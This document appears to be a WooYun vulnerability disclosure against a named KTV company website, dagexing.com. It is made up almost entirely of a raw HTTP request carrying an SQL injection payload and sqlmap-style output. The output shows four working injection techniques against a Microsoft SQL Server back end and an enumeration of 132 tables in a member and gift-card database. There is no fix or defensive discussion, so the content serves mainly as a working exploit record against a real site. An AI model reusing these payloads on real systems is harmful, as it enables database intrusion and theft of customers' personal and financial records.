WooYun.org

地址：www.dagexing.com
POST /order/checkGroupBuyCode.action HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=E5ABCE2EE25E063B1FDF0753DBB8F24A.jvm1
Host: www.dagexing.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
code='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(121)%2bCHAR(75)%2bCHAR(73)%2bCHAR(107)%2bCHAR(50)%2bCHAR(102)%2bCHAR(49)%2bCHAR(101))%20FROM%20syscolumns)%2b'
Place: POST
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(75)+CHAR(73)+CHAR(107)+CHAR(50)+CHAR(102)+CHAR(49)+CHAR(101)) FROM syscolumns)+'' AND 9020=9020 AND 'ucso'='ucso
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: code=-4383' OR 2409=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (2409=2409) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113))) AND 'AbGg'='AbGg
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: code=-3140' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(121)+CHAR(119)+CHAR(113)+CHAR(107)+CHAR(89)+CHAR(117)+CHAR(101)+CHAR(68)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(110)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: code=-3547' OR 1350=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'wccJ'='wccJ
---
web application technology: Apache
back-end DBMS: Microsoft SQL Server 2008
Database: KTV_MMS
[132 tables]
+------------------------------------------+
| cdc.captured_columns |
| cdc.change_tables |
| cdc.dbo_MMS_ACCESS_SRC_CT |
| cdc.dbo_MMS_BLACK_LIST_CT |
| cdc.dbo_MMS_CARD_CT |
| cdc.dbo_MMS_CARD_TYPE_CT |
| cdc.dbo_MMS_COUPON_BATCH_CT |
| cdc.dbo_MMS_COUPON_CATEGORY_CT |
| cdc.dbo_MMS_COUPON_DISTRIBUTION_BATCH_CT |
| cdc.dbo_MMS_COUPON_SUBTYPE_CT |
| cdc.dbo_MMS_COUPON_TYPE_CT |
| cdc.dbo_MMS_CUSTOMER_TYPE_CT |
| cdc.dbo_MMS_DEGRADE_RULE_CT |
| cdc.dbo_MMS_EXCHANGE_RULE_CT |
| cdc.dbo_MMS_LOAD_BATCH_CT |
| cdc.dbo_MMS_MEMBER_CLASS_CT |
| cdc.dbo_MMS_MEMBER_COMPANY_CLASS_CT |
| cdc.dbo_MMS_MEMBER_EXT_CT |
| cdc.dbo_MMS_MEMBER_LOCKING_CT |
| cdc.dbo_MMS_MEMBER_PROMOTION_CT |
| cdc.dbo_MMS_MEMBER_TYPE_CT |
| cdc.dbo_MMS_MEMBER_WECHAT_CT |
| cdc.dbo_MMS_POINT_RULE_CT |
| cdc.dbo_MMS_POINT_SRC_CT |
| cdc.dbo_MMS_PROMOTION_ITEM_CT |
| cdc.dbo_MMS_STORE_REWARD_CHOICE_CT |
| cdc.dbo_MMS_STORE_REWARD_CT |
| cdc.dbo_MMS_STORE_REWARD_JOURNAL_CT |
| cdc.dbo_MMS_UPGRADE_RULE_CT |
| cdc.ddl_history |
| cdc.index_columns |
| cdc.lsn_time_mapping |
| MMS_ACCESS_SRC |
| MMS_BIRTHDAY_PROGRAM_ITEM |
| MMS_BIRTHDAY_PROGRAM_ITEM |
| MMS_BLACK_LIST |
| MMS_CARD_INVENTORY |
| MMS_CARD_INVENTORY |
| MMS_CARD_PURCAT |
| MMS_CARD_SALE |
| MMS_CARD_SERIAL |
| MMS_CARD_TEMP |
| MMS_CARD_TYPE |
| MMS_CASH_COUPON_EXT |
| MMS_CLASS_PROGRAM |
| MMS_CONTROL |
| MMS_COUPON_BATCH |
| MMS_COUPON_BATCH |
| MMS_COUPON_CATEGORY |
| MMS_COUPON_DISTRIBUTION_BATCH |
| MMS_COUPON_EXT |
| MMS_COUPON_HIST |
| MMS_COUPON_INVENTORY |
| MMS_COUPON_JOURNAL |
| MMS_COUPON_PROMOTION |
| MMS_COUPON_SERIAL |
| MMS_COUPON_SUBTYPE |
| MMS_COUPON_TYPE |
| MMS_CUSTOMER_TYPE |
| MMS_DAILY_COME |
| MMS_DEGRADE_CANDIDATE |
| MMS_DEGRADE_RULE |
| MMS_DEGRADE_SUBSIDIARY |
| MMS_EXCHANGE_RULE |
| MMS_GIFTCARD_BATCH_SELL |
| MMS_GIFTCARD_BATCH_SELL |
| MMS_GIFTCARD_CARD_TRAIL |
| MMS_GIFTCARD_DATE_STAT |
| MMS_GIFTCARD_JOURNAL |
| MMS_GIFTCARD_STATE_TRAIL |
| MMS_GIFTCARD_STATE_TRAIL |
| MMS_GIFTCARD_STATUS_TRAIL |
| MMS_GIFTCARD_STORE_RULE |
| MMS_GRADE_TRAIL |
| MMS_INCR_MEMBER |
| MMS_LEGACY_GIFTCARD |
| MMS_LEGACY_MEMBER_BILL |
| MMS_LEGACY_MEMBER_BILL |
| MMS_LOAD_BATCH |
| MMS_MARKETING_COUPON |
| MMS_MARKETING_ITEM |
| MMS_MARKETING_NOTIFY |
| MMS_MEMBER_ACCOUNT |
| MMS_MEMBER_ACCOUNT |
| MMS_MEMBER_APP |
| MMS_MEMBER_BILL_DETAIL |
| MMS_MEMBER_BILL_DETAIL |
| MMS_MEMBER_CABINET_CHOICE |
| MMS_MEMBER_CABINET_CHOICE |
| MMS_MEMBER_CABINET_COMMIT |
| MMS_MEMBER_CABINET_HIST |
| MMS_MEMBER_CARD_TRAIL |
| MMS_MEMBER_CARE |
| MMS_MEMBER_CAT2 |
| MMS_MEMBER_CAT2 |
| MMS_MEMBER_CAT3 |
| MMS_MEMBER_CLASS |
| MMS_MEMBER_COMPANY_CLASS |
| MMS_MEMBER_EXT |
| MMS_MEMBER_LOCKING |
| MMS_MEMBER_MARKETING |
| MMS_MEMBER_MISC |
| MMS_MEMBER_PROMOTION |
| MMS_MEMBER_RATING |
| MMS_MEMBER_REWARD_COMMIT |
| MMS_MEMBER_STATE_TRAIL |
| MMS_MEMBER_STATE_TRAIL |
| MMS_MEMBER_TYPE |
| MMS_MEMBER_WECHAT |
| MMS_POINT_EXCHANGE |
| MMS_POINT_JOURNAL |
| MMS_POINT_RULE |
| MMS_POINT_SRC |
| MMS_POINT_TRAIL |
| MMS_PROMOTION_ITEM |
| MMS_PUR_BATCH_LINE |
| MMS_PUR_BATCH_LINE |
| MMS_STORE_JOURNAL |
| MMS_STORE_REWARD_CHOICE |
| MMS_STORE_REWARD_CHOICE |
| MMS_STORE_REWARD_JOURNAL |
| MMS_SYSTEM_PROFILE |
| MMS_UPGRADE_RULE |
| MMS_VERSION |
| MMS_WECHAT_PINCODE |
| VSYS_ALL_ITEM |
| VSYS_COMPANY |
| VSYS_ITEM_OPER |
| VSYS_ITEM_OPER |
| VSYS_USER |
| systranschemas |
| vip |
+------------------------------------------+